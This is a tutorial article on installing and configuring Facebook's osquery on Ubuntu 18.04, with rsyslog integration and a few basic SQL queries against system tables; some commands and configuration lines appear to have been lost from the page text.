Facebook has done some remarkable things–especially in the technology field. One bit of tech evolution they pulled off is in creating osquery. If you’ve never heard of this tool, it exposes the entire operating system as a high-performance relational database, which can then be queried using SQL-based queries. Osquery is an incredibly complex system that can do very difficult things. It can be installed on Linux, macOS, and Windows and enables admins to gain insight into numerous areas of the operating system (including profiles, performance, security, and more).
I want to show you how to install osquery on Ubuntu 18.04. You will greatly benefit from giving the official documentation a read before diving too deep into this tool. You’ll need that understanding before attempting to write queries beyond the basics.
In the meantime, let’s get osquery installed.
SEE: Quick glossary: Storage (Tech Pro Research)
What you’ll need
You’ll only need two things to get osquery running on Ubuntu Server 18.04: The operating system installed and a user account with sudo privileges. And with that out of the way, let’s install.
The installation of osquery is actually quite simple. Before we do install the tool, let’s update and upgrade. Remember, however, if your kernel is upgraded in the process, the server needs to reboot, in order for the changes to take effect. Because of this, you might want to run the update/upgrade commands during off-hours (if this is a production machine).
To run the update/upgrade, open up a terminal window and issue the following commands:
sudo apt-get update
sudo apt-get upgrade
With the above out of the way, you can install osquery with the following commands:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys $OSQUERY_KEY
sudo add-apt-repository 'deb [arch=amd64] https://pkg.osquery.io/deb deb main'
sudo apt-get install osquery -y
And that’s all there is to the installation.
Once installed, you’ll need to undertake a bit of configuration. The first thing is to give osquery access to Syslog (so it can read/consume system logs). In order to make this happen, rsyslog must be installed. To accomplish this, issue the command:
sudo apt-get install rsyslog -y
Next, create a new configuration file with the command:
sudo nano /etc/rsyslog.d/osquery.conf
Inside that new file, add the following:
*.* action(type="ompipe" Pipe="/var/osquery/syslog_pipe" template="OsqueryCsvFormat")
Save and close the file.
Now we need to create a custom osquery configuration file. Issue the command:
sudo nano /etc/osquery/osquery.conf
In that new file, add the following:
"query": "SELECT * FROM crontab;",
"query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
"query": "SELECT username, time, host FROM last WHERE type=7",
"SELECT uuid AS host_uuid FROM system_info;",
"SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;"
Save and close the file.
Start and enable osquery with the commands:
sudo systemctl start osqueryd
sudo systemctl enable osqueryd
Restart rsyslog with the command:
sudo systemctl restart rsyslog
With osquery installed and working with syslog, let’s see how the tool is used. To gain access to the interactive osquery shell, issue the command:
You can issue the command .help to see a list of basic commands (Figure A).
You can see a list of the various tables osquery uses (Figure B) to store information by issuing the command .tables.
Let’s say you want to read the schema of the system_info table. To do that, issue the command:
You now know what information osquery will grab. But let’s get some actual details. Issue the command:
SELECT * FROM system_info;
You’ll see a complete table of all the information of your system. However, that table can be a bit cumbersome to view. Let’s gets specifics about the CPU with the command:
SELECT cpu_type, cpu_physical_cores, cpu_logical_cores, cpu_microcode FROM system_info;
You should see very specific information about your system listed (Figure C).
Let’s say you want to get more details about the running kernel, than uname -r gives you. Issue the command:
SELECT * FROM kernel_info;
You should see plenty of information about your OS kernel (Figure D).
You now have a very basic understanding as to how osquery works. Again, I highly recommend digging through the official documentation to keep learning about this incredibly powerful and useful tool.